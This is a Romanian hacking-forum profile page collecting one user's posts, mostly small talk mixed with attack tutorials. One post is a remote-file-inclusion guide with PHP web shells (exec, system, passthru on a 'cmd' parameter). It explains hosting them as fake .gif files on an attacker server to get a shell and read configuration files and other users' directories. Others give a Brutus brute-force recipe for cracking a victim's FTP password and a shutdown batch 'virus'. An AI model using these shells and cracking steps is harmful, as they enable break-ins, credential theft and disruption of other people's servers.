curiosul
-
Posts
990 -
Joined
-
Last visited
-
Days Won
4
Posts posted by curiosul
-
-
O da, deabia astept un telefon care sa-mi prepare un hamburger
-
Pai ce, acuma trebuie sa inlocuiesc plantele cu apa?
Sau nu, cred ca apa e prea tare ca plantele mele
-
so, asta chiar ca ma sperie
-
-
Am scos la imprimanta 12 exemplare si tot nu am reusit;
Cred ca este imposibil;
De acord cu loki
-
AaAaa? Despre ce este vorba? aAaAa?
Chiar nu m-am prins
-
) Tu ai modificat-o?
-
Tare tare astea, si ii faina si reclama originala ce mai....
-
si cam ce resurse ar cere ca sa stiu inainte sa-l descac...
-
e pa naiba
-
Parca azi era vorba sa inacepem...da nu vad pe nimeni care sa fi postat ceva pe site
-
Tehnica destul de celebra (RFI) , permite includerea mai multor arhive in alte servere ; majoritatea vulnerabilitatilor de genul asta se gasesc in coduri cum ar fi :
<?include"$page";
?>
Asta ar fi exploatat in modul urmator :
vuln.php?page=http//[atacant]Normal ar fi sa trimitem la o pagina care sa poata executa comenzile.
Arhiva poate contine :
<?exec($_GET[cmd],$iesire);
foreach($iesire as $line) { echo "$line<br>"; }
?>
exec();
<?system($_GET[cmd],$iesire);
foreach($iesire as $line) { echo "$line<br>"; }
?>
system();
<?passthru($_GET[cmd],$salida);
foreach($salida as $line) { echo "$line<br>"; }
?>
passthru();
Odata ce aveti arhiva cu codul , puneti o extensie .jpg sau .gif. Uploadati pe serverul victima , si totul este pregatit . Acum imaginativa ca avem adresa : http://atacant.com/xploitulnostru.gif . In xpl.gif trebuie sa fie unul din cele 3 coduri de mai sus . Fiecare cod din cele 3 foloseste o varianta distincta , pt ca unele servere pot bloca unele dintre ele .
Acum faceti un url asa : victima.com: The Leading Personal Injury Site on the Net
Si asta executa xploitul vostru , si primiti un fel de shell .
Ce poti face cu asta ?
Mai multe ... poti executa comanda cat de ex , si sa vezi arhive (de configurare de ex) , deasemenea puteti face cat in arhivele altor useri ("cd/home/gheorghe/public_html;") cat si "config.php"
sau sa obtineti o lista de arhive ("cd/home/gheorghe/public_html;ls")
Tutorialul nu este cine stie ce...este pentru incepatori...
Si nu-mi asum responsabilitatea pentru contextul in care folositi tutorialul
-
)acuma am vazut..da io am primit tutorialul asta de la altcineva man
Nu l-am luat de pe site la tine...pur si simplu mi-a dat acest trick..asta-i tot
Ai putea sa verifici ip-urile de pe site la tine..ca n-am intrat niciodata decat azi...cand mi-ai dat llink-ul ala:P
Si vorbeste si tu mai frumos omule fara coaie
-
Click4Trick
nu da credite , primul care te ia la morti o sa fiu eu
Nu inteleg ce vrei sa spui si care ii problema ta ...
-
Pai asa este...dar este si asta o metoda...trebuie doar noroc cat incape
Dar nu e chiar imposibil
-
Pentru a cracka un ftp , ai nevoie de :
brutus
ms-dos
Metoda e putin cam lenta, insa sigura .
Cum se face :
-deschide cmd si scrie : ping www.adresa.com (si obtii ipul victimei)
-acum deschideti brutus , si unde scrie FTP , puneti ipul pe care l-ati obtinut cand ati facut pingul
(verificati ca ftpul e activ)
-configurati brutus :
target : ftp:victima.com
type : ftp
port : 21
connections : 34
timeout : 10
userid : victimaa
passfile : biblioteca voastra de passuri
-dupa ce ati configurat , dati start , si asteptati sa gaseasca passwordul. (poate dura ceva timp .... cu cat mai mare biblioteca ta , cu atat mai bine)
-
) chiar ca io prins cu mata-n sac
-
Pentru a obtine o imagine mai clara adaugati :
&feature=related&fmt=18Asadar ar arata cam asa :
Cateodate filmuletele vin cu o parte din cod :
asa ca adaugati doar ce lipseste :
&fmt=18Sper sa fie de folos
-
pentru ca verifica semnatura digitala (hashul md5).
arhiveaza-l si pune parola rstcenter.
Si daca pune parola nu o sa-l mai stearga?
-
Si cum se foloseste? Cu ce trebuie sa completez pe acolo...
-
@echo off
shutdown -s -t 00
exit
.bat ...nui cine stie ce...
Am creat cativa si vad ca toti "virusii" astea au aceeasi baza... .bat
-
Cat despre revista, ne-ar trebui articole scrise de noi, nu luate dupa Google. Si nu am vazut prea multe articole scrise pe aici... Cu alte cuvinte cineva ar trebui sa munceasca, sa isi piarda o parte din timp pentru revista, si nu cred ca sunt prea multi doritori. Totusi eu m-as baga.
Da, si sa stie limba romana...
-
Si eu conturi pe filelist, scenefz si atte trackere pt xss valid in yahoo...
-
Pare a fin fain site-ul..dau 3 conturi filelist pt cont/invitatie i play
Conturi cu ratie peste 5
Ce imi recomandati ptr. wireless compatibil cu WEP Cracking ?
in Wireless Pentesting
Posted
Normal ca merge si fara placa wireless, ori iti cumperi adaptor wireless ori iti cumperi placa wireless, acelasi lucru